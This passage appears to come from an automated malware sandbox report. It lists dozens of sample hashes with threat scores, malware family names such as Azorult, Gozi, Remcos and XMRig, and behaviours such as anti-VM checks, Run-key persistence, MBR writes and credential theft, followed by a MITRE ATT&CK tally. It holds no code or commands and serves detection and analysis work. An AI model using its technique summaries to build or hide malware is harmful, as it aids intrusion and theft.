    Score
    9/10
    evasionpersistence

    • Identifies VirtualBox via ACPI registry values (likely anti-VM)

      evasion

    • Checks BIOS information in registry

      BIOS information is often read in order to detect sandboxing environments.

    • Drops startup file

    • Identifies Wine through registry keys

      Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

      evasion

    • Adds Run key to start application

      persistence
    behavioral121behavioral122

    • Target

      foo/a2981192a30538e97b55f363abbce946

    • Size

      804KB

    • MD5

      a2981192a30538e97b55f363abbce946

    • SHA1

      ae16cec3416895c912b03b7f76be2177aede6745

    • SHA256

      99e7e093c6f7be4cf21b5068a4ae746be2b3a4475ec251288d02a3985de70d48

    • SHA512

      b03fa2f833951441f5bf56711296b48a6ece3b3964d15893fcff78563e808de88fff9d644c4b73253add71eb729a7e1dc4095abdd33a7a26d60eab904e7661d3

    Score
    10/10
    xmrigminer

    • xmrig

      XMRig is a high performance, open source, cross platform CPU/GPU miner.

      minerxmrig

    • Executes dropped EXE

    • Loads dropped DLL

    • Drops file in System32 directory

    behavioral123behavioral124

    • Target

      foo/aa3b51bd50bcc98f763cffcf7f907152

    • Size

      840KB

    • MD5

      aa3b51bd50bcc98f763cffcf7f907152

    • SHA1

      17868a0f0c8d52ffb80e120a010fd7737e0ecd4c

    • SHA256

      dd518cbba0506c2392969aa01ba4b9f5216724d9234055d7f0ac1db93227baf4

    • SHA512

      aba0fb7359b45e7f206632219873ee6834c01b89a9f6b4001b8299ee5422a02cfc25cf17c40522349e98b5911b09d771ec793a70e29d9770b51cf873c64249cd

    Score
    10/10
    azorultinfostealerpersistencetrojan

    • Azorult

      An information stealer that was first discovered in 2016, targeting browsing history and passwords.

      trojaninfostealerazorult

    • Executes dropped EXE

    • Loads dropped DLL

    • Adds Run key to start application

      persistence
    behavioral125behavioral126

    • Target

      foo/acf0b7f4fe980501192187bb9b8e20c4

    • Size

      872KB

    • MD5

      acf0b7f4fe980501192187bb9b8e20c4

    • SHA1

      f627019b79fd174403cb81c9a59b1ed81b658e81

    • SHA256

      d8f2f635135cc57f0d566646bbe5c6f22be2aa4d9fcab74c272b22f7e4b28f6c

    • SHA512

      df3afaf21da7bfca412a6bcfea39913904d5a95767220f30e07d23487276fbce7bb489bf12b11f68e2a5651fc3c2b4041d76e201d3416a8bea460418d7a25683

    Score
    8/10
    evasionpersistencetrojan

    • Executes dropped EXE

    • Loads dropped DLL

    • Adds Run key to start application

      persistence

    • Checks whether UAC is enabled

      evasiontrojan

    • Enumerates connected drives

      Attempts to read the root path of hard drives other than the default C: drive.

    behavioral127behavioral128

    • Target

      foo/aeca5c301d02253e8ffcc240c08f61f7

    • Size

      105KB

    • MD5

      aeca5c301d02253e8ffcc240c08f61f7

    • SHA1

      a7d94fc834a9e73e35ea48d0d1630e2a8cfebf97

    • SHA256

      ae2b285ce6b791fc7b0b01e923db298cb53b43e646a7f34bf1c8c79c94cfc0d2

    • SHA512

      f72e6608f437f59ad924ffd5de19785262931b6e4ab2a8a70970c9aa60488ea5df08b284bb3ecbda5ae2c9b8395c2919f34e0cb051b042a41782a7a59d66fcd2

    Score
    1/10
    behavioral129behavioral130

    • Target

      foo/b1071426aa88f31339f1b369cf13cef3

    • Size

      504KB

    • MD5

      b1071426aa88f31339f1b369cf13cef3

    • SHA1

      69ff5bd81f366fece2d36c98cc3bf4a2d41b8f68

    • SHA256

      08dca503de70aabb60f5edb4ca366523a86084cf4546ad25e338c2ced99f2f6c

    • SHA512

      a6e1dd3c13dd952d09ae9cdcf1b94c99ab9b0fe7c58d957eb558353f61084ec6ae9e133f8c449ffc434efaaf3f767e30709547e3efb2106839e2d31574b18ac1

    Score
    8/10
    persistenceransomwarespyware

    • Modifies extensions of user files

      Ransomware generally changes the extension on encrypted files.

      ransomware

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

      spyware

    • Adds Run key to start application

      persistence

    • Drops desktop.ini file(s)

    behavioral131behavioral132

    • Target

      foo/b2365260985173cc758575cd8059459f

    • Size

      645KB

    • MD5

      b2365260985173cc758575cd8059459f

    • SHA1

      f6e874021db45fcd4042c621499ab925b4dec1c8

    • SHA256

      d30b001d1a77d323443e37323aabc9c316dbd3be556cb57854644cd875885ba8

    • SHA512

      6fec4a3b28f4f1c8fae9e0c2f04d0157f6b4a2db87b98837dc0330820dac97c373c10cd323af421d2e3dc1be93862d645a3620c9e8f86717d65eb695c65cecca

    Score
    6/10
    evasiontrojan
    behavioral133behavioral134

    • Target

      foo/b514b59324818c52140b431aeac96bfc

    • Size

      155KB

    • MD5

      b514b59324818c52140b431aeac96bfc

    • SHA1

      83d7256670dccce993acf2df73872abda39bb5be

    • SHA256

      ae57d0af018f011cd42ed91caba202201069be6fc5de6b8b3ab14162cbcbfbe5

    • SHA512

      4bfb86bd70c1f1b376255972708efd2dadc252566625d02e84ec5297580edfa50a9e321ae1503bdc6bcbe1beea8b607f445caa4bb1c940363f47512407ca6649

    Score
    1/10
    behavioral135behavioral136

    • Target

      foo/b641961018d09dfbd7fa9c15f09a7723

    • Size

      8.9MB

    • MD5

      b641961018d09dfbd7fa9c15f09a7723

    • SHA1

      69e515dd8840866fbfb1e239daf80f6fcb745f1b

    • SHA256

      44095d0a22646ef5b369ade7ce87d2f9bd51402de73f977f352de9a3a3eeed6c

    • SHA512

      e9e43f1d59be84fbc918ea601a7b489286661a81919b760e2a0339fedb93b9d3a33b148cfefdd584c163957107194b764eb2ddbad79ca2af9a5e90db3c1c9beb

    Score
    7/10

    • Loads dropped DLL

    behavioral137behavioral138

    • Target

      foo/b693dfe99d2915616044eea2cfe18360

    • Size

      286KB

    • MD5

      b693dfe99d2915616044eea2cfe18360

    • SHA1

      6415634e1fcc51714e871ccb08f26b4806aed3b0

    • SHA256

      1d4169bb0978e88bdff29844645d54763e62db8af10abc324fb2145f64304024

    • SHA512

      95081c20adc6363ba3c0f7d6390a98c5f47074a270f112a002f549009d6c50654756b89f59737b7554e3186c17355dcda57424e255aba1392a574a4b27734efb

    Score
    7/10

    • Loads dropped DLL

    behavioral139behavioral140

    • Target

      foo/b6e7c9793cf40153bf8865195e06ecbc

    • Size

      3.3MB

    • MD5

      b6e7c9793cf40153bf8865195e06ecbc

    • SHA1

      fef5dbf8ef53dafd676818196815e6b110f2bc03

    • SHA256

      0e0cb0d76bc848f729878dab7218f4e12c9c0cc7d5c939e5d92995ba422ea7ec

    • SHA512

      d12eb44304f7054e060a105bff9f3861aa16bb10fd72bbd819a8ffe3d23818ce66f5d790a929d41cee4161bbbe78d0077d167fe792c3e27c018dc88632a5e5ee

    Score
    10/10
    gozi_ifsbbankerbootkitevasionpersistencetrojan

    • Gozi, Gozi IFSB

      Gozi ISFB is a well-known and widely distributed banking trojan.

      bankertrojangozi_ifsb

    • Identifies VirtualBox via ACPI registry values (likely anti-VM)

      evasion

    • Executes dropped EXE

    • Checks BIOS information in registry

      BIOS information is often read in order to detect sandboxing environments.

    • Identifies Wine through registry keys

      Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

      evasion

    • Loads dropped DLL

    • Adds Run key to start application

      persistence

    • Checks whether UAC is enabled

      evasiontrojan

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

    • Writes to the Master Boot Record (MBR)

      Bootkits write to the MBR to gain persistence at a level below the operating system.

      bootkitpersistence

    • Suspicious use of NtSetInformationThreadHideFromDebugger

    behavioral141behavioral142

    • Target

      foo/b7d5f0b9bf2e6e13c5b3ca1c2a0a8b4a

    • Size

      99KB

    • MD5

      b7d5f0b9bf2e6e13c5b3ca1c2a0a8b4a

    • SHA1

      15a0e8dea24b904cd083ed51b28098726ecceed4

    • SHA256

      0b499361076d8d02fa6b313a08199fd10cd9af1abc7fae0b091039be0194c0f3

    • SHA512

      674d28fb9900070fd0cc58940fb97fbbeabea2d167ad19e248fe8a980221f6ea79d9f1795c019b844896e8b19ce1d746bda6c34040c1ae535b9e22135692a0d0

    Score
    10/10
    warzoneratinfostealerpersistencerat

    • WarzoneRat, AveMaria

      WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.

      ratinfostealerwarzonerat

    • Warzone RAT Payload

      rat

    • Executes dropped EXE

    • Loads dropped DLL

    • Adds Run key to start application

      persistence
    behavioral143behavioral144

    • Target

      foo/ba2d460199eb2d9e9d6d0559bb455529

    • Size

      39KB

    • MD5

      ba2d460199eb2d9e9d6d0559bb455529

    • SHA1

      8c50ef4cd9feadf857ad2d501e3d03bd55d5de4d

    • SHA256

      a3f13a940ae3f6d0a8e94c8ab203005cd737a899962425f1600a4bdf30877375

    • SHA512

      dd376f8f9f05d509eca465c04c451d83a12043f614d90a04c63b25f202f9e87e3960666e2710e19538c9818a778fd81832b45c1e495c263b6725991413755fcc

    Score
    1/10
    behavioral145behavioral146

    • Target

      foo/bad78e11371381ce9e1d703aac2821e5

    • Size

      210KB

    • MD5

      bad78e11371381ce9e1d703aac2821e5

    • SHA1

      76ad0abaf1c99c741352a16e5b2f71fb38fed0e4

    • SHA256

      18dfcf81046272e08f6ef3230df83008cb78eb30cda341c59ceb33c5be542d85

    • SHA512

      8bccc4535dd97b483f10eda69f91a17e794b122215bb2e926a114ec46e8935ab0a1e5e1cb0b6fa3b6bb0a5a6d1b669a87579850197af4a0c33b3bb57a7f00b25

    Score
    9/10
    ransomwarespyware

    • Deletes shadow copies

      Ransomware often targets backup files to inhibit system recovery.

      ransomware

    • Modifies extensions of user files

      Ransomware generally changes the extension on encrypted files.

      ransomware

    • Deletes itself

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

      spyware

    • Drops desktop.ini file(s)

    behavioral147behavioral148

    • Target

      foo/bc6536b86b04cf5b3bf7cd353d615ab9

    • Size

      583KB

    • MD5

      bc6536b86b04cf5b3bf7cd353d615ab9

    • SHA1

      5e796021e22ed016697d6aefb0b955c57b4b8dc8

    • SHA256

      1e8dbcedd0e30e32583548508edc4cf2b8f3d0f731a1a65559fe83382298136f

    • SHA512

      f1f3fd81b2e56daa77cabbed191978b51308d8202e35d34cdc300d9fa429a426f88fad618ae7df9bed0a6f2ce665ad4586a5d5cbc6099e98e4b9bcda1cd160ab

    Score
    10/10
    xmrigdiscoveryevasionminerpersistenceupx

    • xmrig

      XMRig is a high performance, open source, cross platform CPU/GPU miner.

      minerxmrig

    • Grants admin privileges

      Uses net.exe to modify the user's privileges.

    • Creates new service(s)

      persistence

    • Executes dropped EXE

    • Modifies Windows Firewall

      evasion

    • Sets file execution options in registry

      persistence

    • Sets file to hidden

      Modifies file attributes to stop it showing in Explorer etc.

      evasion

    • Stops running service(s)

      evasion

    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

      upx

    • Loads dropped DLL

    • Modifies file permissions

      discovery

    • Modifies WinLogon

      persistence

    • Drops file in System32 directory

    behavioral149behavioral150

    • Target

      foo/be85e0b2608a55942aa101c66ce6c32c

    • Size

      728KB

    • MD5

      be85e0b2608a55942aa101c66ce6c32c

    • SHA1

      77e651fa75f8221458777a0d290ccae73682204a

    • SHA256

      c77d9095b13bfa202cfdfa87475cb1799fcdf8152a3d298300d63ca16abd3757

    • SHA512

      f0a2f943e251cc96ee7026bdc25cc920afd79d42ab1ec112a641d881602117fa1cfd8b39b18b9e28a9e6b1401fcf133e052be2e63a654eaf34075342a7d5a3bd

    Score
    1/10
    behavioral151behavioral152

    • Target

      foo/c914b169d1388c5e78421045d05946ee

    • Size

      3.5MB

    • MD5

      c914b169d1388c5e78421045d05946ee

    • SHA1

      4f2de494d334710253cf3ad40faf1d07e048d55c

    • SHA256

      e1ee4f9cb208e3560177f49c3e809a29ff9fa0b0daed5316f17caf22647e4eef

    • SHA512

      96dc235e2a93f99682f26f95ff0986db2b8a09e5b3470122270de5c3ea77575356178a51c6d7e3515f68fad894ebb63e2b86e3766f6f12ffa3930ca1192205f2

    Score
    3/10
    behavioral153behavioral154

    • Target

      foo/c944eadb6e032fd9e7a0988464a6f1cc

    • Size

      160KB

    • MD5

      c944eadb6e032fd9e7a0988464a6f1cc

    • SHA1

      c21551f6885ac52f80a5e303ef3cb6d40c182d11

    • SHA256

      2e4a248e3f279a42e2bea37409ab0de8770a3cd4a3b5fcccd701a535c2436d52

    • SHA512

      475ed1d94361538bdd71d21b4127fc1b7bab5edfc0ad917b7c3bbdfa51a8ed11ff6f0d4df47e3be266f07a4722448d53a926d041a161a5646efec94eecd3bde9

    Score
    8/10
    upx

    • Executes dropped EXE

    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

      upx

    • Loads dropped DLL

    behavioral155behavioral156

    • Target

      foo/cad3634df5d5058551bed38237ab8e8b

    • Size

      823KB

    • MD5

      cad3634df5d5058551bed38237ab8e8b

    • SHA1

      2f2ac22494e49ce18470677690ee9bdfcd9f0c74

    • SHA256

      663ef562dbd3a7fc7490fd6ebc11c328450db6f5a9f9e058c4d3ec663b925147

    • SHA512

      bc1eee26f9375f0138fc571aaf2602d9b4c14e7052867e739fd131450b3453a1a19424031ae6ff80c1cfac4a6e71e9087255e97a3f3d9053f84451b745054ebe

    Score
    6/10

    • Legitimate hosting services abused for malware hosting/C2

    behavioral157behavioral158

    • Target

      foo/cd89b6c808c296cde0bc77ee630dc7df

    • Size

      284KB

    • MD5

      cd89b6c808c296cde0bc77ee630dc7df

    • SHA1

      47a17c5b8263acb882f078b81897f615c25de0ca

    • SHA256

      246ad930ec77776b847e9470b725029f5dd5e0384b869d6105c3571b8cb8189a

    • SHA512

      a51620d5170356cabb73cfe2f9f2de54d52467c3a126b2b34eef5d18a84b6cd6e68b2003168c8b077abee1d58d1aa9e5af58ee65eaaee4a75f9414c04bc169fa

    Score
    8/10
    persistencespyware

    • Executes dropped EXE

    • Loads dropped DLL

    • Reads data files stored by FTP clients

      Tries to access configuration files associated with programs like FileZilla.

      spyware

    • Reads user/profile data of local email clients

      Email clients store some user data on disk where infostealers will often target it.

      spyware

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

      spyware

    • Adds Run key to start application

      persistence

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

    • Suspicious use of SetThreadContext

    behavioral159behavioral160

    • Target

      foo/d81e76123ccb64b73eeac2f31a7434c4

    • Size

      4.7MB

    • MD5

      d81e76123ccb64b73eeac2f31a7434c4

    • SHA1

      6a32284225e897965972ba4915e5c327b900b81a

    • SHA256

      695ac197f95781e22c61604838e3e339285b08259a971289ce6993d409fcbc4a

    • SHA512

      37404b0e8fa7825f837ff9d6ab1e487bc1591daf46b57bfe030b7c015937ba80605db96f649ec024761d13eeb2cba86ab50870af9007bc75fe6043fd8b8f6cc0

    Score
    10/10
    gluptebadropperevasionloaderpersistencetrojanupx

    • Glupteba

      Glupteba is a modular loader written in Golang with various components.

      loaderdropperglupteba

    • Glupteba Payload

    • Suspicious use of NtCreateUserProcessOtherParentProcess

    • Windows security bypass

      evasiontrojan

    • Executes dropped EXE

    • Modifies Windows Firewall

      evasion

    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

      upx

    • Loads dropped DLL

    • Windows security modification

      evasiontrojan

    • Adds Run key to start application

      persistence
    behavioral161behavioral162

    • Target

      foo/d86d2cb12111422ad0b401afa523e308

    • Size

      894KB

    • MD5

      d86d2cb12111422ad0b401afa523e308

    • SHA1

      d019e10b793b78f2da2f006acdb0aeff6b57d927

    • SHA256

      bfefbd8050f0dfbe1047ddcc07e951967a5b8395190127d97d0c3a4441c919bf

    • SHA512

      e9bea547df7cd2b5cfab5890245ca2540828eb87aba7052a3d5c0cc11d03552c8d39ba0bfc9994acafc257facf9797f1cbaa149e7628d99124bf2b53b840a78e

    Score
    10/10
    hawkeye_rebornm00nd3v_loggerkeyloggerspywarestealertrojan

    • HawkEye Reborn

      HawkEye Reborn is an enhanced version of the HawkEye malware kit.

      keyloggertrojanstealerspywarehawkeye_reborn

    • M00nd3v_Logger

      M00nd3v Logger is a .NET stealer/logger targeting passwords from browsers and email clients.

      stealerspywarem00nd3v_logger

    • M00nD3v Logger Payload

      Detects M00nD3v Logger payload in memory.

    • NirSoft MailPassView

      Password recovery tool for various email clients

    • NirSoft WebBrowserPassView

      Password recovery tool for various web browsers

    • Nirsoft

    • Drops startup file

    • Uses the VBS compiler for execution

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

    • Suspicious use of SetThreadContext

    behavioral163behavioral164

    • Target

      foo/d8e37dd7ca017370a0b54147a27a7498

    • Size

      8.4MB

    • MD5

      d8e37dd7ca017370a0b54147a27a7498

    • SHA1

      c6167da141d215d31aef6ac9e332f58118edb70d

    • SHA256

      00ef059476bea303a3d8c6621e7286c32a953e4c83c30361938fd338e9665f9b

    • SHA512

      6a0c989f8ebfe2dc2706a4241db52962dadc6cf94749a9408dd534531582a061be3aa860e65b15e96c172292b607c8606e4e8fde11e05b0840f4eb2e4540b355

    Score
    9/10

    • ACProtect 1.3x - 1.4x DLL software

      Detects file using ACProtect software.

    • Loads dropped DLL

    behavioral165behavioral166

    • Target

      foo/dea515c25081073ec2cee293b2991ee1

    • Size

      1.4MB

    • MD5

      dea515c25081073ec2cee293b2991ee1

    • SHA1

      811a254ac1f803d5707310f87e454bb7504f0757

    • SHA256

      9ee19d067ec19b2c6d07726448639c869d61138e2f53c9eed136c3a2622c881b

    • SHA512

      68886a649fbc0f53a63fd7f437508dd93dd7e8cd6ae67640a07206a4ffdf349c7e662721b42c9cb68a889888d29d6d693f26273ce2db27d36440f4482cb8d530

    Score
    10/10
    remcospersistencerat

    • Remcos

      Remcos is a closed-source remote control and surveillance software.

      ratremcos

    • Executes dropped EXE

    • Loads dropped DLL

    • Adds Run key to start application

      persistence

    • Suspicious use of SetThreadContext

    behavioral167behavioral168

    • Target

      foo/dfcc555a02bccc9c438b08555b5c2ab8

    • Size

      252KB

    • MD5

      dfcc555a02bccc9c438b08555b5c2ab8

    • SHA1

      5f10b75aa47823bc7e81a859fdced21b8556040d

    • SHA256

      1095b754656cf05da5e65406de095e1b1dd4b28c2c2f8efca5e34283bd17e0b5

    • SHA512

      fcb9ef49ec2f7eab67394997a92cdb15c11878434c6ed47240fafd71ea4c8993fbd0f986d4086e51473a5168d472e4eaeb993491bd36f0a804008dc5a0eb6b6c

    Score
    7/10

    • Loads dropped DLL

    behavioral169behavioral170

    • Target

      foo/e03bd458de4a107688236bdc4ddc3afe

    • Size

      431KB

    • MD5

      e03bd458de4a107688236bdc4ddc3afe

    • SHA1

      55859c4fa195c36a48425bb8aca9ef3609b62e89

    • SHA256

      344bce1df6486b71b78e85d6dce7ba1929176afda786acac56b6a11b625cd21c

    • SHA512

      f4585ddb1aff65d34a5a33c95a29c0c816f0ed5009faf7cc7ba26adf9bea3e787c1efa82c9c8423fc2bfdc8d4b9324566f0ab33b4212bb625c36052fb27c5948

    Score
    8/10
    upx

    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

      upx

    • Suspicious use of SetThreadContext

    behavioral171behavioral172

    • Target

      foo/e16ec7bc29b68f66e90fdbfefe1d3a2d

    • Size

      674KB

    • MD5

      e16ec7bc29b68f66e90fdbfefe1d3a2d

    • SHA1

      156d9d781a1302d8e958486effcec79713c41708

    • SHA256

      fe9470a406b6dadc18cb3a430671d3ac321e97eb8d1ecf0dc054db440df7187d

    • SHA512

      c9e7c58170fb110bb9b76ec17a4349f5a73b912cd6c36d85d1aca7f1c94cbf70563900c36c4702f49a3ff4776fd45162e4a0f94ca826b2eff60668bcca9c55ec

    Score
    8/10

    • Executes dropped EXE

    • Loads dropped DLL

    behavioral173behavioral174

    • Target

      foo/e61c0e180c2616fa81e6c4d581a9520e

    • Size

      4.9MB

    • MD5

      e61c0e180c2616fa81e6c4d581a9520e

    • SHA1

      d91996fabaa7a1af229ce118551aeef66e389cb7

    • SHA256

      a2fd87672b5dc07057c47208124b7f02862c4f5512f1b667ea27bc79a8d57ba2

    • SHA512

      21c84bd84c125be26d7fe053a0b11d2c31f29a38355be85ed17d2303b5700c7b335a7c2a924e6a1c4c3b05ff9fbda88745a20ad3a0449f6c193d718f503e68de

    Score
    7/10
    spyware

    • Reads data files stored by FTP clients

      Tries to access configuration files associated with programs like FileZilla.

      spyware

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

      spyware

    • Accesses cryptocurrency files/wallets, possible credential harvesting

      spyware
    behavioral175behavioral176

    • Target

      foo/e78fad8a5d0ea89127ed36ed20bc9351

    • Size

      11.1MB

    • MD5

      e78fad8a5d0ea89127ed36ed20bc9351

    • SHA1

      816c12862830ec0c0ec065c7d73f2128cb4cc9dd

    • SHA256

      b25d571c5210bb02ba01a54a75a781094397bda7bc4745b2aa4c4a971233fb56

    • SHA512

      515e6aac22e11d8fb9663fab08250afe56c94faf93fe8062cea079d8633d1338f4e94735a5a46cf75b16c05570090cb1a47a464aaa64e549432536f4dce03d9f

    Score
    8/10

    • Executes dropped EXE

    • Loads dropped DLL

    behavioral177behavioral178

    • Target

      foo/e7ad45164be5c3c7f9936e9b5fb28788

    • Size

      558KB

    • MD5

      e7ad45164be5c3c7f9936e9b5fb28788

    • SHA1

      a2cd13bc8bce9b107ac38662c35d70c4ff1d16b8

    • SHA256

      8c9c9951c2bf631b818a5e1dcdf700342f1c0c05391ec3c9c4ee15496aa28f4f

    • SHA512

      1bc0e6e3b9e416cf152d2ddef23d928c90725b589eb30d62c1c6f880af83b3068de1d27050e89f9961d71f664f98a6694fc0cf698d1c861c9a7b131efa419bfa

    Score
    3/10
    behavioral179behavioral180

    • Target

      foo/e95678212c7218c6e7944fca1631c88f

    • Size

      861KB

    • MD5

      e95678212c7218c6e7944fca1631c88f

    • SHA1

      45a011ec5b1eb913a6f9bf4b46389dbeeeb6e1f3

    • SHA256

      2a5100ba7bfe592e112ab0071d8ea1861b4d365fc4fb98f4e2be0459b990db72

    • SHA512

      16f286de9ceb5545efc477741ec0e69f4de40e1a864ed00d16854e1c0580655f5d0ea93450602c3a2598e889078ab8a12923244710c67b23e3f3551fd0f76b9e

    Score
    1/10
    behavioral181behavioral182

    • Target

      foo/edf723c8e404cd67041e7dfbbb1a6eee

    • Size

      75KB

    • MD5

      edf723c8e404cd67041e7dfbbb1a6eee

    • SHA1

      96a2fda8f26018724c86b275fe9396e24b26ec9e

    • SHA256

      bf2534b2f059547967bb453d67909921a41c10cdd19c1ec346a193060b094e2e

    • SHA512

      04bea993ba6af7e568bdfee4185e8145e4111af6bb92a68de3785658e0f5a65e741b378848eb9e77aa200cd72ab94339fcf852aae41cac45ea64bd430b8f9f50

    Score
    1/10
    behavioral183behavioral184

    • Target

      foo/f2366f48d3534bc8af573f2696dce4f5

    • Size

      191KB

    • MD5

      f2366f48d3534bc8af573f2696dce4f5

    • SHA1

      706750f403d6f12c10489befa6032c1c4eb30a3e

    • SHA256

      f7fab7d724f492cb7baccb49c5fdef8305bebe9896a6853913b5d3ec225d51b0

    • SHA512

      9fd4632204c33bbd124bfff5744c8da551a4a8f94c4f714413861e92f6b4d70f4f506d8079540adfd19ded4ace9c9745891617bbfa3d00784cfea24b04913c35

    Score
    1/10
    behavioral185behavioral186

    • Target

      foo/f645a94491240317caccd6f8508fba1f

    • Size

      1.9MB

    • MD5

      f645a94491240317caccd6f8508fba1f

    • SHA1

      59c94235d380d09a479291cd3400694d1c2ec18d

    • SHA256

      c130982342656ad1b4d588b0e985ec9d6169f279bbb748cd09727a3e96622fd2

    • SHA512

      8731c4c9cce9922793418ee7ae095893195f0609731aa0312fd38d548a94b2ba0a5bd437a8586c4c05f85cd45cac61caad3f1311b91b9db87baf61a2d4327280

    Score
    1/10
    behavioral187behavioral188

    • Target

      foo/f65e75d9675a50f9b4807e79dcc48d56

    • Size

      1.8MB

    • MD5

      f65e75d9675a50f9b4807e79dcc48d56

    • SHA1

      8ed35b0ce78c565441ee6ac5722347fbeb220305

    • SHA256

      36a4d9e2eb623e59acbaf14341c3998114fcce9bc37392572213d9d22b2fb450

    • SHA512

      9da997c23af8b5bb90abfa7eb7e967ef026645604d3652a39a7c2a9ce719e7110956fe7e491c9bf733fd1da14f0cc518681bde409498c12797678e166c72fc5f

    Score
    1/10
    behavioral189behavioral190

    • Target

      foo/f660284cb3574213a512e3f03ca9012b

    • Size

      995KB

    • MD5

      f660284cb3574213a512e3f03ca9012b

    • SHA1

      8051d5262c8c67e8888fc1991fbe667d4b4e311d

    • SHA256

      f0d6ee327670c99e451f6e54b842a3ced72b1de7e586ba81bdd27dc5366613d0

    • SHA512

      3b54928c6d1eb9e36db5ec8aeffa06b08d3e5c4167d9a884d2133282e5511edcaa7eed45832ff172bd1e71ddd56150f726382c528960f7db82a6aa87c6e9d890

    Score
    8/10
    discoveryspyware

    • Executes dropped EXE

    • Loads dropped DLL

    • Reads user/profile data of local email clients

      Email clients store some user data on disk where infostealers will often target it.

      spyware

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

      spyware

    • Checks installed software on the system

      Looks up Uninstall key entries in the registry to enumerate software on the system.

      discovery

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

    • Suspicious use of SetThreadContext

    behavioral191behavioral192

    • Target

      foo/f6c1c72f3e45d2f3499b6bd6661b3289

    • Size

      387KB

    • MD5

      f6c1c72f3e45d2f3499b6bd6661b3289

    • SHA1

      aabaf0e9fbda0e00d53ef30ad736b9a3db9973c2

    • SHA256

      90120bc1c6a88ef6032b2ea5da0b8e9432ce6cfe126e9fef4515f0660a6a88ec

    • SHA512

      c50e1c73ea369c7dd87a650a635b3e9702a4be13ddba87cf1ba649e9ad8522503d643d256486dbd3973b35beb3e77d97d180c771d099c40f380834647ce9f318

    Score
    10/10
    azorultinfostealertrojan

    • Azorult

      An information stealer that was first discovered in 2016, targeting browsing history and passwords.

      trojaninfostealerazorult
    behavioral193behavioral194

    • Target

      foo/fbab903080d6a4e65a1a2f6bc4d97b7c

    • Size

      1.6MB

    • MD5

      fbab903080d6a4e65a1a2f6bc4d97b7c

    • SHA1

      0a7eee729e7d140ca81b9595578ee305651a6946

    • SHA256

      cf1b96af0838abbd8b8a292f4aa5e335743eb3d5da862254a86184db37ecf85e

    • SHA512

      894bc25e7bdab656988a8e6b419eeee4b696e9e644f38142fcb373f557dd7170dc7ce0979ccd3c6b84b0eea32822669c9f244182391d1719c8db22d5c61b1dd7

    Score
    7/10

    • Loads dropped DLL

    • Drops file in System32 directory

    behavioral195behavioral196

    • Target

      foo/fcdc003a1529fe3660b160fd012173b3

    • Size

      3.4MB

    • MD5

      fcdc003a1529fe3660b160fd012173b3

    • SHA1

      a517d1137be23fc41f03efdb0e9354089bedf6ba

    • SHA256

      6490b57b8944f8f07e687a4dfa6ab76080de99ffc9d48d4c10f64dd88fa2cb95

    • SHA512

      a00b22d8a348891a828e4c16e0e56fc66caf29fa1f43ca3cd97ffa76675700446e905750016ea083a67592a7d2aea02c3396306527efb7fa255e08c9748e7d21

    Score
    8/10
    upx

    • Executes dropped EXE

    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.

      upx

    • Loads dropped DLL

    behavioral197behavioral198

    • Target

      foo/fffb61eaaac6e8a40bfaa7a4acb6b9ba

    • Size

      195KB

    • MD5

      fffb61eaaac6e8a40bfaa7a4acb6b9ba

    • SHA1

      84deb15aeea324b2d11922c2fa4aebd039a5f805

    • SHA256

      8e22a34621adf78355b916d1a96ef4a6de5caa0dcb6e7949fa2df88ddfd999fd

    • SHA512

      07a9f94e70e461142e3e06921bfca1f9fe8723a68b6ff067651f5685bbf1c823de4beda42dc4c1ef44c969a494682e2c41ba6a1235d0a978ce6d070f4b24bd38

    Score
    1/10
    behavioral199behavioral200

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

1
T1059

Scheduled Task

1
T1053

Scripting

1
T1064

Persistence

Account Manipulation

1
T1098

Bootkit

1
T1067

Browser Extensions

1
T1176

Hidden Files and Directories

2
T1158

Modify Existing Service

5
T1031

New Service

1
T1050

Registry Run Keys / Startup Folder

3
T1060

Scheduled Task

1
T1053

Winlogon Helper DLL

2
T1004

Privilege Escalation

Bypass User Account Control

1
T1088

New Service

1
T1050

Scheduled Task

1
T1053

Defense Evasion

Bypass User Account Control

1
T1088

Disabling Security Tools

4
T1089

File Deletion

2
T1107

File and Directory Permissions Modification

1
T1222

Hidden Files and Directories

2
T1158

Impair Defenses

1
T1562

Indicator Removal on Host

1
T1070

Install Root Certificate

1
T1130

Modify Registry

17
T1112

Scripting

1
T1064

Virtualization/Sandbox Evasion

2
T1497

Web Service

1
T1102

Credential Access

Account Manipulation

1
T1098

Credentials in Files

4
T1081

Discovery

Peripheral Device Discovery

3
T1120

Process Discovery

1
T1057

Query Registry

10
T1012

Remote System Discovery

1
T1018

System Information Discovery

11
T1082

Virtualization/Sandbox Evasion

2
T1497

Lateral Movement

Collection

Data from Local System

4
T1005

Command and Control

Web Service

1
T1102

Exfiltration

Impact

Defacement

1
T1491

Inhibit System Recovery

2
T1490

Service Stop

1
T1489

Tasks

static1

upxaspackv201535648626pyinstallerratvmprotectcobaltstrikeqakbotlimeratgozi_ifsbwarzonerat
Score
10/10

behavioral1

Score
1/10

behavioral2

Score
1/10

behavioral3

Score
4/10

behavioral4

Score
4/10

behavioral5

smokeloaderbackdoortrojan
Score
10/10

behavioral6

smokeloaderbackdoortrojan
Score
10/10

behavioral7

bootkitpersistence
Score
8/10

behavioral8

bootkitpersistence
Score
8/10

behavioral9

discovery
Score
7/10

behavioral10

discovery
Score
7/10

behavioral11

Score
8/10

behavioral12

Score
8/10

behavioral13

imminentspywaretrojan
Score
10/10

behavioral14

imminentspywaretrojan
Score
10/10

behavioral15

Score
1/10

